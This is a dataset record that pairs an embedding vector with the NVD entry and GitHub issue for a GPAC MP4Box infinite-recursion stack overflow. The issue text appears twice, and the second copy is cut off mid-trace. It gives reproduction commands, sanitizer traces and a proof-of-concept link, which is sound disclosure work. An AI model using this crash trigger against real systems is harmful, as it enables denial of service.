-0.023176997900009155, -0.002747769933193922, -0.010681573301553726, 0.019045446068048477, -0.0005213925032876432, -0.007708871271461248, 0.009781844913959503, -0.017591485753655434, -0.005574715789407492, 0.018383247777819633, -0.020254680886864662, -0.0010049963602796197, 0.010213715024292469, -0.002337493933737278, 0.0034567557740956545, -0.005513534415513277, 0.014179716818034649, -0.00727700162678957, -0.003023086814209819, -0.0021791416220366955, 0.008975688368082047, 0.014726751483976841, 0.02585458941757679, 0.00822711456567049, 0.012200314551591873, 0.003582717850804329, -0.012164325453341007, -0.00579784857109189, 0.009544316679239273, 0.014705157838761806, 0.005186033435165882, -0.003107661148533225, -0.02621448040008545, 0.005902217235416174, -0.021233586594462395, -0.003699682420119643, -0.0059813931584358215, 0.0127689428627491, -0.013970979489386082, -0.000015632776921847835, 0.0050852638669312, -0.002902523148804903, -0.012157127261161804, -0.0025984151288866997, -0.030864275991916656, -0.010602396912872791, 0.013416747562587261, 0.00596699770539999, 0.0007769152871333063, 0.014525212347507477, -0.00838546734303236, 0.010847123339772224, -0.018224895000457764, -0.01219311635941267, -0.0017526705050840974, -0.025321951135993004, 0.02275952510535717, 0.012632183730602264, 0.009443547576665878, -0.004495042376220226, 0.001108465134166181, 0.009450744837522507, 0.0009276198106817901, 0.026401624083518982, 0.0027243769727647305, -0.00999058224260807, -0.007528925780206919, -0.004095562733709812, -0.0075361235067248344, 0.012185919098556042, -0.00941475573927164, 0.008630192838609219, 0.007665684446692467, 0.017461925745010376, -0.03374340757727623, 0.01070316694676876, 0.0024328650906682014, 0.0035269346553832293, -0.008687775582075119, -0.019175007939338684, -0.007406562566757202, -0.0003358235699124634, -0.0015898197889328003, 0.014208507724106312, -0.013136032037436962, -0.006164937745779753, 0.011379762552678585, -0.002269114600494504, 0.025955360382795334, 0.012466633692383766, 0.00553152896463871, -0.024515794590115547, 0.018268082290887833, 0.006708373781293631, 0.003408170538023114, -0.003357785753905773, -0.017145220190286636, -0.009911405853927135, 0.018771929666399956, 0.006125349551439285, -0.0019524102099239826, -0.010904706083238125, 0.011768445372581482, -0.007262606173753738, 0.0011012672912329435, 0.001015793182887137, -0.0018399441614747047, 0.0028071519918739796, 0.013107240200042725, 0.002898924285545945, -0.010285693220794201, 0.013524714857339859, 0.0013603890547528863, 0.010163329541683197, 0.008846127428114414, -0.0026901874225586653, -0.008155136369168758, 0.013409549370408058, 0.03403132036328316, 0.039271336048841476, 0.011890808120369911, -0.018527204170823097, -0.009817834012210369, -0.024573376402258873, 0.012783338315784931, 0.020988859236240387, 0.020283473655581474, 0.006550021469593048, 0.023680847138166428, -0.020513802766799927, 0.00006005686009302735, 0.004444657359272242, 0.0008772350265644491, -0.013215208426117897, 0.006424059625715017, -0.007586508523672819, 0.020888090133666992, -0.017030056565999985, 0.00940036028623581, 0.022313259541988373, 0.022687546908855438, 0.02696305513381958, -0.029323941096663475, 0.018066542223095894, 0.012257897295057774, 0.010501627810299397, -0.019045446068048477, -0.004764960613101721, -0.013294383883476257, 0.02347930707037449, 0.012099545449018478, 0.02506282925605774, 0.030720319598913193, 0.014568399637937546, 0.00044401586637832224, -0.0009789043106138706, 0.007449749391525984, -0.0029313145205378532, -0.0013783836038783193, 0.003958804067224264, 0.0022295264061540365, 0.02160787209868431, 0.026041733101010323, -0.0037824574392288923, -0.010192121379077435, 0.00044626518501900136, 0.008133542723953724, 0.0024166700895875692, -0.012754547409713268, -0.010775145143270493, 0.00706826476380229, 0.0015430338680744171, -0.0011579502606764436, -0.0224860068410635, 0.008730962872505188, -0.0053803748451173306, -0.0105088260024786, 0.014028562232851982, -0.0029457102064043283, -0.007680079899728298, 0.015633678063750267, 0.0027243769727647305, -0.003105861833319068, 0.010278495028614998, -0.014201310463249683, -0.013798232190310955, -0.0014647574862465262, 0.0006226119003258646, 0.020513802766799927, -0.012034764513373375, 0.026185689494013786, -0.023983154445886612, 0.029568668454885483, -0.006596807390451431, 0.005164439789950848, -0.0077736517414450645, 0.01098388247191906, -0.0064132628031075, 0.013056855648756027, 0.01029289048165083, 0.010091351345181465, 0.008946897462010384, 0.0003373980871401727, -0.009436349384486675, 0.014813125133514404, 0.005096060689538717, -0.0016492018476128578, 0.020153911784291267, 0.0006217121845111251, -0.002152149798348546, 0.012070753611624241, -0.001601516269147396, 0.010516023263335228, 0.009371569380164146, -0.013755044899880886, -0.0045166355557739735, -0.009493932127952576, 0.021032046526670456, -0.0011291588889434934, 0.030605154111981392, -0.019405338913202286, -0.014510816894471645, 0.009616294875741005, 0.011278992518782616, 0.001567326602526009, 0.01407894678413868, -0.0035287339705973864, -0.011991577222943306, 0.010494429618120193, 0.01744752936065197, 0.03069152869284153, 0.008011179976165295, 0.005517133511602879, 0.00047505649854429066, 0.0061721354722976685, 0.0004719074349850416, 0.02569623850286007, 0.020513802766799927, 0.007043072488158941, 0.02252919413149357, 0.01823928952217102, -0.0033217966556549072, -0.003771660616621375, -0.0018984265625476837, -0.004131551831960678, -0.0008884816197678447, -0.008277499116957188, 0.016353460028767586, -0.004282706417143345, -0.011761247180402279, 0.013150427490472794, -0.010494429618120193, -0.018743138760328293, 0.006229718215763569, 0.02311941608786583, -0.020470615476369858, -0.010220912285149097, -0.011797236278653145, 0.0020855700131505728, -0.006218921393156052, 0.0019236189546063542, -0.024573376402258873, -0.0006365576991811395, -0.013330372981727123, -0.009141238406300545, -0.017821816727519035, -0.007435353938490152, 0.01769225485622883, -0.0127113601192832, 0.009292392991483212, 0.018627973273396492, 0.017001263797283173, -0.015547303482890129, 0.018944676965475082, 0.00087498570792377, -0.002611011266708374, 0.003667292185127735, -0.00351973669603467, 0.0012470233486965299, -0.0015916192205622792, 0.024127112701535225, -0.01832566410303116, -0.030115703120827675, -0.015691259875893593, 0.009767449460923672, 0.019635668024420738, 0.002787357894703746, 0.02427106909453869, -0.028330642729997635, -0.01744752936065197, 0.0014782535145059228, 0.008896512910723686, -0.010609595105051994, -0.00550273759290576, -0.010537616908550262, 0.0034063709899783134, -0.0151442252099514, 0.0016519010532647371, -0.015576094388961792, -0.007413760293275118, 0.019088633358478546, 0.007086259312927723, 0.017073241993784904, -0.0016680960543453693, 0.003807649714872241, 0.002456258051097393, -0.015792028978466988, 0.014597190544009209, 0.01946292072534561, 0.010343275964260101, 0.007528925780206919, 0.007946399971842766, -0.023450516164302826, 0.0065824114717543125, -0.0046353996731340885, 0.00039835466304793954, -0.00490531837567687, 0.0008817336638458073, -0.01135816890746355, 0.004030782263725996, -0.007017880212515593, -0.002718978561460972, 0.009839427657425404, -0.028100311756134033, 0.007449749391525984, 0.006524829193949699, 0.012157127261161804, 0.027567671611905098, 0.012063556350767612, 0.021420728415250778, -0.008954095654189587, -0.0007665684097446501, -0.005556721240282059, -0.008781347423791885, 0.009349975734949112, -0.024832498282194138, -0.004073969554156065, 0.005711474921554327, -0.013589494861662388, 0.001860637916252017, 0.004937708377838135, 0.004732570610940456, -0.0030770704615861177, 0.005675485357642174, -0.007608101703226566, -1.5464078728655295e-7, 0.002062177052721381, -0.0034747503232210875, -0.01314322929829359, 0.014338068664073944, 0.01816731132566929, 0.028848884627223015, -0.003683487419039011, -0.009486733935773373, -0.005315594375133514, -0.00010622416448313743, 0.005304797552525997, -0.018224895000457764, -0.016684560105204582, -0.012545810081064701, 0.01566246896982193, -0.0015016463585197926, 0.027222177013754845, -0.0017589686904102564, 0.01776423305273056, -0.028057124465703964, -0.008421456441283226, -0.02608492039144039, -0.005517133511602879, -0.0011318580945953727, -0.021435124799609184, -0.010400857776403427, -0.008313489146530628, 0.01171805988997221, 0.0124306445941329, -0.008709369227290154, 0.002629005815833807, -0.016886098310351372, 0.018771929666399956, -0.00002818679786287248, -0.02156468667089939, 0.011278992518782616, -0.011228607967495918, -0.006711972411721945, 0.004606608301401138, 0.008529423736035824, -0.013546307571232319, 0.028143499046564102, 0.022154906764626503, -0.004621004220098257, -0.004577816929668188, 0.011653279885649681, -0.003246219363063574, 0.013459933921694756, 0.003618706949055195, 0.012718558311462402, 0.002726176520809531, 0.02133435569703579, -0.00727700162678957, -0.015576094388961792, -0.0015520311426371336, 0.007975190877914429, -0.0016707952599972486, -0.014841916970908642, -0.0027423715218901634, -0.01153811439871788, -0.015273786149919033, 0.014841916970908642, -0.0016779931029304862, -0.0012443241430446506, 0.022025346755981445, 0.0076368930749595165, 0.002510241698473692, -0.0019542097579687834, 0.010739156045019627, -0.0008371971198357642, 0.033887363970279694, 0.03161285072565079, -0.0006005686009302735, -0.017548298463225365, 0.016583791002631187, -0.015734447166323662, 0.008666181936860085, 0.0046965815126895905, 0.011566906236112118, -0.0013711857609450817, 0.015360159799456596, 0.01074635423719883, 0.004351085517555475, -0.006434855982661247, -0.0002696935262065381, 0.012337073683738708, 0.011257399804890156, -0.013891804032027721, 0.017159616574645042, 0.039588041603565216, -0.005934607237577438, 0.01035047322511673, -0.013085647486150265, 0.007888817228376865, 0.005024082493036985, 0.013107240200042725, 0.0038472379092127085, 0.00121913175098598, -0.03394494578242302, -0.009083655662834644, 0.008903710171580315, 0.007766454014927149, -0.018224895000457764, -0.00005409615914686583, -0.01258899737149477, 0.005527930334210396, -0.01053041871637106, -0.008414258249104023, -0.01225069910287857, -0.009673877619206905, 0.019678855314850807, -0.00033020024420693517, -0.009465141221880913, -0.003908419515937567, -0.012718558311462402, 0.011099047027528286, 0.011178223416209221, 0.012754547409713268, -0.0055711171589791775, -0.002216930268332362, -0.011977181769907475, 0.009889812208712101, -0.013387955725193024, -0.010947893373668194, 0.006258509587496519, 0.013827023096382618, 0.012243501842021942, 0.00017094836221076548, -0.0036277042236179113, 0.000826850242447108, -0.0015745243290439248, 0.013128833845257759, 0.03100823238492012, 0.013639879412949085, 0.01970764622092247, 0.030115703120827675, -0.010868716984987259, -0.012934492900967598, 0.031037025153636932, -0.005632298532873392, -0.00993299949914217, -0.001510643633082509, 0.031900763511657715, 0.017793025821447372, -0.02113281562924385, 0.009285194799304008, -0.0004665090818889439, 0.036968033760786057, 0.008299092762172222, -0.0019901988562196493, -0.002657797187566757, 0.01140135619789362, 0.0036115089897066355, 0.0063268886879086494, -0.0016662966227158904, 0.0057258703745901585, 0.0005749263218604028, -0.021665455773472786, -0.001142654800787568, -0.00941475573927164, 0.0014224703190848231, 0.024141507223248482, 0.003431563498452306, -0.006524829193949699, -0.019779624417424202, 0.01903105154633522, 0.03351307660341263, -0.02137754298746586, 0.016483020037412643, 0.008378269150853157, 0.011293388903141022, -0.017001263797283173, 0.010811134241521358, 0.005704276729375124, -0.008529423736035824, -0.004883724730461836, -0.010559210553765297, 0.01835445500910282, -0.006240515038371086, -0.002607412403449416, -0.006092959549278021, -0.013459933921694756, -0.007165435701608658, -0.016223900020122528, -0.00009503379260422662, 0.0019434129353612661, -0.024357441812753677, -0.009472338482737541, 0.012632183730602264, 0.003257016185671091, -0.00846464280039072, -0.0026200085412710905, -0.011430147103965282, 0.0038868258707225323, 0.006647191941738129, -0.0067551592364907265, 0.013265592977404594, -0.005625100806355476, 0.0062441136687994, 0.015331368893384933, -0.023105019703507423, -0.04088364914059639, -0.007946399971842766, 0.004383475985378027, 0.012934492900967598, 0.004300700966268778, -0.002888127462938428, -0.00443026190623641, -0.01661258190870285, -0.023148206993937492, -0.02081611193716526, -0.006420460529625416, 0.02077292464673519, -0.025005247443914413, 0.024040738120675087, -0.008673380129039288, -0.00042557145934551954, 0.004513036925345659, -0.013431143015623093, 0.007179831154644489, -0.0302884504199028, 0.011811631731688976, -0.0013360964367166162, 0.008003981783986092, -0.014942686073482037, 0.0204562209546566, -0.013913396745920181, -0.0033361921086907387, -0.009558712132275105, 0.01211394090205431, 0.004304299596697092, 0.012265094555914402, 0.011084651574492455, 0.016065547242760658, -0.013020866550505161, 0.016439834609627724, -0.0028035531286150217, -0.03354186937212944, -0.010026571340858936, -0.010480034165084362, 0.03204471990466118, 0.018728742375969887, -0.022989856079220772, 0.017951376736164093, -0.007359776645898819, 0.0004487394471652806, 0.007280600722879171, -0.005412764847278595, 0.016914891079068184, 0.0004903518711216748, 0.035586051642894745, -0.010156132280826569, -0.022673150524497032, -0.01923258975148201, -0.00481894426047802, 0.001066177967004478, 0.002625406952574849, -0.004408668261021376, 0.032419007271528244, -0.006096558179706335, 0.004567020572721958, -0.005949003156274557, -0.013287186622619629, -0.023148206993937492, 0.015043456107378006, -0.005286803003400564, 0.008500631898641586, 0.017073241993784904, 0.011307784356176853, 0.021708643063902855, -0.0008637391147203743, 0.023364141583442688, -0.008543819189071655, -0.006276504136621952, 0.030202075839042664, 0.015547303482890129, -0.0033379916567355394, -0.005092461593449116, 0.01898786425590515, -0.004995291121304035, -0.0014728551032021642, -0.006812741979956627, 0.009645086713135242, 0.005513534415513277, 0.005819442216306925, 0.005441556219011545, 0.0013172021135687828, 0.01395658403635025, 0.0036474980879575014, 0.000026331108529120684, -0.0014089744072407484, -0.01954929530620575, -0.004383475985378027, 0.010084154084324837, -0.0060173822566866875, 0.0470161959528923, 0.009925801306962967, 0.008658984676003456, 0.00035674223909154534, -0.012164325453341007, -0.030864275991916656, -0.00288452859967947, 0.0006077663856558502, -0.018138520419597626, -0.0024832498747855425, -0.03429044038057327, -0.00916283205151558, 0.01074635423719883, -0.009681075811386108, -0.008752556517720222, -0.014489223249256611, -0.030979441478848457, 0.0174043420702219, -0.006269306410104036, -0.022226884961128235, 0.002713580382987857, -0.009882614947855473, -0.0004363681946415454, 0.006895516999065876, -0.006909912917762995, -0.003055477049201727, 0.011862017214298248, 0.02632964588701725, -0.0019668058957904577, -0.03889704868197441, 0.019290173426270485, -0.011602895334362984, 0.039357710629701614, -0.0015745243290439248, -0.0017679659649729729, 0.020081933587789536, 0.008457445539534092, 0.0057078758254647255, 0.009349975734949112, 0.002846740186214447, 0.010242505930364132, -0.0030680731870234013, -0.011293388903141022, -0.014784334227442741, 0.0003448208444751799, 0.007082660682499409, -0.006711972411721945, 0.013697462156414986, -0.002726176520809531, -0.0017427735729143023, 0.003951606340706348, 0.008392664603888988, -0.008320686407387257, 0.009054864756762981, 0.012106742709875107, -0.012999272905290127, 0.010580804198980331, -0.020686551928520203, -0.01613752543926239, -0.0022421227768063545, -0.025163598358631134, -0.007564914878457785, 0.021003255620598793, 0.039271336048841476, -0.01235146913677454, 0.003568322164937854, 0.02732294611632824, 0.006280102767050266, 0.004797350615262985, 0.025437116622924805, 0.004685784690082073, -0.010033768601715565, -0.020844902843236923, -0.01602235995233059, 0.010501627810299397, -0.008558214642107487, 0.025480303913354874, 0.011790038086473942, -0.020441824570298195, -0.016267085447907448, 0.01772104762494564, -0.020225889980793, 0.03267812728881836, 0.012509820982813835, 0.0007476741448044777, 0.0016420040046796203, 0.004405069164931774, -0.008594203740358353, -0.010336077772080898, 0.01975083351135254, 0.0014170719077810645, 0.007233814802020788, -0.0008214518311433494, -0.015072247013449669, 0.0033343927934765816, -0.010811134241521358, -0.007680079899728298, -0.018584785982966423, 0.001911022700369358, 0.00814793910831213, -0.006765956059098244, -0.004271909594535828, -0.006265707314014435, -0.0037824574392288923, 0.008529423736035824, 0.019794020801782608, 0.0172891765832901, -0.004966499749571085, -0.025595467537641525, 0.007788047194480896, 0.013531912118196487, 0.024371838197112083, -0.005232819356024265, 0.007003484293818474, -0.022586777806282043, 0.0025498296599835157, -0.021751828491687775, 0.013035262003540993, -0.014885103330016136, 0.007046671584248543, -0.026876680552959442, 0.0048333401791751385, 0.0066255987621843815, -0.00957310851663351, 0.009306788444519043, 0.0070538693107664585, -0.015518512576818466, 0.003332593245431781, -0.014006968587636948, 0.031094606965780258, -0.009616294875741005, 0.0006298097432591021, 0.0009537119185552001, 0.006294498685747385, 0.016785329207777977, 0.029568668454885483, -0.0003823844890575856, -0.006834335625171661, 0.0071726334281265736, 0.013942188583314419, -0.027567671611905098, 0.038522765040397644, -0.015417742542922497, 0.0008115548407658935, -0.001049982849508524, 0.014035760425031185, -0.003721275832504034, -0.0067551592364907265, -0.0014305678196251392, -0.023450516164302826, -0.004423063714057207, 0.0022277270909398794, 0.012337073683738708, -0.0005636797286570072, -0.0067551592364907265, 0.02605612948536873, -0.003158045932650566, 0.0047901528887450695, 0.010321682319045067, 0.004451855085790157, -0.0008241510367952287, -0.0034711514599621296, -0.007025077939033508, 0.0034567557740956545, 0.013697462156414986, 0.005931008607149124, 0.016281481832265854, -0.0033127993810921907, -0.001202936633490026, 0.006229718215763569, -0.008205520920455456, 0.010566407814621925, 0.012632183730602264, -0.0049269115552306175, 0.011422949843108654, 0.02013951726257801, 0.0017085839062929153, 0.017548298463225365, 0.010962288826704025, 0.0047901528887450695, 0.004700180143117905, -0.014453234151005745, -0.005247214809060097, -0.005499138962477446, 0.016886098310351372, -0.023565681651234627, -0.006809143349528313, 0.017476320266723633, -0.0022799111902713776, 0.01455400325357914, -0.012898503802716732, 0.007730464916676283, 0.01760588213801384, -0.019002260640263557, -0.002726176520809531, 0.004505838733166456, 0.008529423736035824, 0.014359662309288979, 0.004955702926963568, 0.010120143182575703, 0.007302194368094206, 0.0031868373043835163, 0.013049658387899399, 0.024630960077047348 ]
CVE-2022-47662
2023-01-05T16:15:11.400000
GPAC MP4Box 2.1-DEV-rev649-ga8f438d20 has a segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2359" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2359
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, # Description segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_segfault2.mp4 ``` Crash reported by sanitizer ``` [HEVC] Error parsing NAL unit type 63 Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] NAL Unit type 26 not handled - adding [HEVC] xPS changed but could not flush frames before signaling state change ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing NAL unit type 32 HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B HEVC Stream uses forward prediction - stream CTS offset: 6 frames HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1 Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4 No suitable destination track found - creating new one (type vide) AddressSanitizer:DEADLYSIGNAL | (57/100) ================================================================= ==738673==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdae782bc0 (pc 0x7f415d384491 bp 0x7ffdae783400 sp 0x7ffdae782bc0 T0) #0 0x7f415d384491 in __sanitizer::StackTrace::StackTrace(unsigned long const*, unsigned int) ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:52 #1 0x7f415d384491 in __sanitizer::BufferedStackTrace::BufferedStackTrace() ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:105 #2 0x7f415d384491 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127 #3 0x7f415787f858 in __GI__IO_free_backup_area libio/genops.c:190 #4 0x7f415787cae3 in _IO_new_file_seekoff libio/fileops.c:975 #5 0x7f415787ad52 in __fseeko libio/fseeko.c:40 #6 0x7f4159a1536a in BS_SeekIntern utils/bitstream.c:1338 #7 0x7f4159a1536a in gf_bs_seek utils/bitstream.c:1373 #8 0x7f4159fbbfc9 in gf_isom_fdm_get_data isomedia/data_map.c:501 #9 0x7f4159fbbfc9 in gf_isom_datamap_get_data isomedia/data_map.c:279 #10 0x7f415a0a1f40 in Media_GetSample isomedia/media.c:641 #11 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #12 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #13 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #14 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #15 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #16 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #17 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #18 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #19 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #20 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #21 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #22 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #23 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #24 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 ... ``` looks like an infinite recursion ``` Media_GetSample isomedia/media.c:662 -> gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 -> gf_isom_get_sample_ex isomedia/isom_read.c:1916 -> Media_GetSample isomedia/media.c:662 ``` if compile without ASAN and run the same poc ``` ./configure --static-bin make ./MP4Box import -cat poc_segfault2.mp4 ``` there will be a segment fault ``` [HEVC] Error parsing NAL unit type 63 Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] NAL Unit type 26 not handled - adding [HEVC] xPS changed but could not flush frames before signaling state change ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing NAL unit type 32 HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B HEVC Stream uses forward prediction - stream CTS offset: 6 frames HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1 Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4 No suitable destination track found - creating new one (type vide) Segmentation fault===== | (57/100) ``` Because it ran out of stack space, making rsp and rbp point to an unmapped memory, causing seg fault. backtrace atm ``` pwndbg> bt ... #16487 0x000000000054d599 in gf_isom_get_sample_ex () #16488 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16489 0x0000000000570e13 in Media_GetSample () #16490 0x000000000054d599 in gf_isom_get_sample_ex () #16491 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16492 0x0000000000570e13 in Media_GetSample () #16493 0x000000000054d599 in gf_isom_get_sample_ex () #16494 0x0000000000521d6d in gf_isom_nalu_sample_rewrite () #16495 0x0000000000570e13 in Media_GetSample () ... ``` # POC [poc-segfault2.zip](https://github.com/gpac/gpac/files/10253557/poc-segfault2.zip) # Impact Potentially causing DoS # Credit Xdchase
Infinite recursion in Media_GetSample isomedia/media.c:662
https://api.github.com/repos/gpac/gpac/issues/2359/comments
0
2022-12-18T10:23:42
2022-12-19T11:26:12Z
https://github.com/gpac/gpac/issues/2359
1,501,850,761
2,359
true
This is a GitHub Issue repo:gpac owner:gpac Title : Infinite recursion in Media_GetSample isomedia/media.c:662 Issue date: --- start body --- - [X] I looked for a similar issue and couldn't find any. - [X] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [X] I give enough information for contributors to reproduce my issue (meaningful title, github labels, # Description segment fault (/stack overflow) due to infinite recursion in Media_GetSample isomedia/media.c:662 # Version info latest version atm ``` MP4Box - GPAC version 2.1-DEV-rev649-ga8f438d20-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` # Reproduce compile and run ``` ./configure --enable-sanitizer make ./MP4Box import -cat poc_segfault2.mp4 ``` Crash reported by sanitizer ``` [HEVC] Error parsing NAL unit type 63 Track Importing L-HEVC - Width 1 Height 6 FPS 25000/1000 [HEVC] NAL Unit type 26 not handled - adding [HEVC] xPS changed but could not flush frames before signaling state change ! [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing NAL unit type 32 [HEVC] Invalid log2_max_pic_order_cnt_lsb_minus4 80, max shall be 12 [HEVC] Error parsing NAL unit type 33 [HEVC] Error parsing Sequence Param Set [HEVC] Error parsing NAL unit type 34 [HEVC] Error parsing NAL unit type 0 [HEVC] Error parsing NAL unit type 32 [HEVC] Error parsing NAL unit type 32 HEVC Import results: 7 samples (39 NALUs) - Slices: 0 I 0 P 1 B - 0 SEI - 0 IDR - 0 CRA HEVC L-HEVC Import results: Slices: 3 I 0 P 2 B HEVC Stream uses forward prediction - stream CTS offset: 6 frames HEVC Max NALU size is 106 - stream could be optimized by setting nal_length=1 Appending file /home/sumuchuan/Desktop/gpac_fuzz/cat_gpac/bin/gcc/out/default/crashes/160.mp4 No suitable destination track found - creating new one (type vide) AddressSanitizer:DEADLYSIGNAL | (57/100) ================================================================= ==738673==ERROR: AddressSanitizer: stack-overflow on address 0x7ffdae782bc0 (pc 0x7f415d384491 bp 0x7ffdae783400 sp 0x7ffdae782bc0 T0) #0 0x7f415d384491 in __sanitizer::StackTrace::StackTrace(unsigned long const*, unsigned int) ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:52 #1 0x7f415d384491 in __sanitizer::BufferedStackTrace::BufferedStackTrace() ../../../../src/libsanitizer/sanitizer_common/sanitizer_stacktrace.h:105 #2 0x7f415d384491 in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:127 #3 0x7f415787f858 in __GI__IO_free_backup_area libio/genops.c:190 #4 0x7f415787cae3 in _IO_new_file_seekoff libio/fileops.c:975 #5 0x7f415787ad52 in __fseeko libio/fseeko.c:40 #6 0x7f4159a1536a in BS_SeekIntern utils/bitstream.c:1338 #7 0x7f4159a1536a in gf_bs_seek utils/bitstream.c:1373 #8 0x7f4159fbbfc9 in gf_isom_fdm_get_data isomedia/data_map.c:501 #9 0x7f4159fbbfc9 in gf_isom_datamap_get_data isomedia/data_map.c:279 #10 0x7f415a0a1f40 in Media_GetSample isomedia/media.c:641 #11 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #12 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #13 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #14 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #15 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #16 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #17 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #18 0x7f4159ec91ca in gf_isom_nalu_sample_rewrite isomedia/avc_ext.c:454 #19 0x7f415a0a305a in Media_GetSample isomedia/media.c:662 #20 0x7f4159ffc579 in gf_isom_get_sample_ex isomedia/isom_read.c:1916 #21 0x7f4159ec91ca in 